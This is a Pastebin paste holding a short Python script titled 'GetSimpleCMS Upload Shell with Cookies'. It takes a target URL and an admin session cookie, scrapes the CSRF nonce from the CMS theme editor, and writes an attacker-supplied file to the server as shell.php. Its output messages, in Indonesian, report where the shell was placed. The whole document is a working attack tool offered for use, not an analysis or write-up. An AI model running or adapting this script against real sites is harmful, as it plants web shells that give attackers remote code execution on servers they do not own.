ToKeiChun

GetSimpleCMS Upload Shell with Cookies

Jul 21st, 2020 (edited)
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.83 KB | None | 0 0
  1. import sys
  2. import requests
  3. import re
  4. url = sys.argv[1]
  5. cookies = input("COOKIES : ")
  6. file = input("file : ")
  7. fileContent = open(file, 'rb')
  8. headers = {
  9.         'Content-Type':'application/x-www-form-urlencoded',
  10.         'Cookie': cookies
  11. }
  12. try:
  13.        r = requests.get("{}/admin/theme-edit.php".format(url), headers=headers)
  14.        nce = re.search('nonce" type="hidden" value="(.*)"', r.text)
  15.        nonce = nce.group(1)
  16.        params = {
  17.           'submitsave': 2,
  18.           'edited_file': "shell.php",
  19.           'content': fileContent,
  20.           'nonce': nonce
  21.        }
  22.        r = requests.post("{}/admin/theme-edit.php".format(url), headers=headers, data=params)
  23.        if 'CSRF detected!' not in r.text:
  24.            print("dah keupload di {}/theme/{}".format(url, "shell.php"))
  25. except Exception as e:
  26.        print("error asu")
Add Comment
Please, Sign In to add comment